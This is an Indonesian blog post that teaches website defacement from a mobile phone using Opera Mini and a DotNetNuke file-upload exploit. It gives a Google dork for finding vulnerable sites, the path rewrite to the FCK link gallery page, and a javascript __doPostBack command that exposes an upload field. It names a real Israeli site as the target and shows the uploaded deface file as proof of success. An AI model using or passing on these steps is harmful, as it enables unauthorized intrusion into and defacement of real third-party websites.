Pada sore hari ini saya akan share cara deface web lewat hp :)
Awalnya saya kira gak Mungin , tetapi semua berubah saya saya lihat hasilnya :D
Daripada basa basi mending langsung cekidot :
Bahan2 yg kita butuhkan adalah:
1. Operamini browser versi 5.02. Operamini browser versi 4.2
Kenapa pake 2 Web Browser ?
Lebih enak pake 2 browser di atas.alasannya
adalah:
- Operamini 5.0 mendukung multi tab jadi
cocok buat mencari target dan mengetesnya
tanpa harus open close satu2.
2. Operamini 5.0 mempunyai kemampuan copy paste,pilih text dan lgsg mensearchnya dlm sekali klik ditab yg sama ataupun membukanya di tab baru.
3. Operamini 4.2 respon browser lbh bagus dr yg v 5.0 Setelah cek target dr opmin 5.0 dan ternyata
vuln tgl copy kan aja linknya di operamini
4.2 .Tgl kta exploit lwt situ..(Operamini 4.2
tdk multi tab,untuk yg multi tab slhkan cari di
opera modif di google)
Nah sekarang memasuki langkah2 atau cara2
melakukan hack web dgn DNN exploit melalui
opera mini.
Pertama: pastikan anda masih mempunyai saldo pulsa
Kedua: buka operamini v 5.0 anda
dan ketik di kolom google search
dorknya-> inurl:”/portals/0″
And search!!…
Nah dapet kan??Tinggal kita pilh target yang pas di hati.dan kali ini saya
coba di situs orang israel.Taruh cursor di link
target trus tekan angka 1 di keypad hape
anda.Pilih open in new tab.Begitu
seterusnya untuk link target yg lain sampai
keluar beberapa tab.Oh,ya untuk mengetahu
gimana ,apa dan bagaimana DNN exploit it
silahkan baca disini:
http://securityreason.com/
exploitalert/6234
Next, misalkan kita dah dpt targetnya nih…
Example site: http://fril.co.il/portals/0/
cwindex.txt
Spti keterangan di securityreason di atas kita
coba potong link target dan menggantinya
dgn /Providers/HtmlEditorProviders/ Fck/
fcklinkgallery.aspx
-> http://site.com/[path]/portals/0/a.txt
Menjadi->http://site.com/[path]/Providers/
HtmlEditorProviders/ Fck/
fcklinkgallery.aspx
Lakukan it pada smua target yg udah kamu
buka pada browser operamini 5.0 km.biar gak
bolak balikcopas lagi.
Setelah dapet dan pasti vuln seperti site di
bawah ini.
http://fril.co.il//Providers/
HtmlEditorProviders/Fck/
fcklinkgallery.aspx
Copy dan pastekan di opera 4.2
kamu.
Nb:Alasannya knapa pindah browser
yaitu pada opera 5.0 di hape saya kurang
respon pada perintahupload. Proses upload
berjalan tapi file tidak terupload dan begitu di
coba di v 4.2 sukses terupload. Tapi bila di
v.5.0 km bisa ya lanjut aja disitu.gak ush
pndah applikasi.Lanjut proses.!
Setelah site target di buka di opmin 4.2
Pilih : file ( select a file on your site)
Tunggu biar loading selesai dan menampilkan
2 kolom:
Kolom 1 biasanya tulisan ‘root’Kolom 2 berisi
macam2 file.Setelah loading selesai hapus link
di addres bar operamini kamu dan ganti dgn
script di bawah ini: javascript:__doPostBack
(‘ctlURL $cmdUpload’,”)
Lalu klik ok….
Kolom yg tdnya berisi ‘root’ dan ‘jenis2
file’Skrg ganti menjadi kolom ‘root’ dan kolom
kosong untuk upload file.Nah skrg tgl km
upload tuh file txt yg udah km simpan di hape
km.SUCCESS..! you cAn hacked a web site
from mobile phone.
Hasilnya seperti ini : http://fril.co.il/portals/0/
xadal.txt < 100% lewat handphone
Nb: angka 1 di operamini berfungsi untuk
copas,select text and open new tab.
-sekian-
0 komentar:
Posting Komentar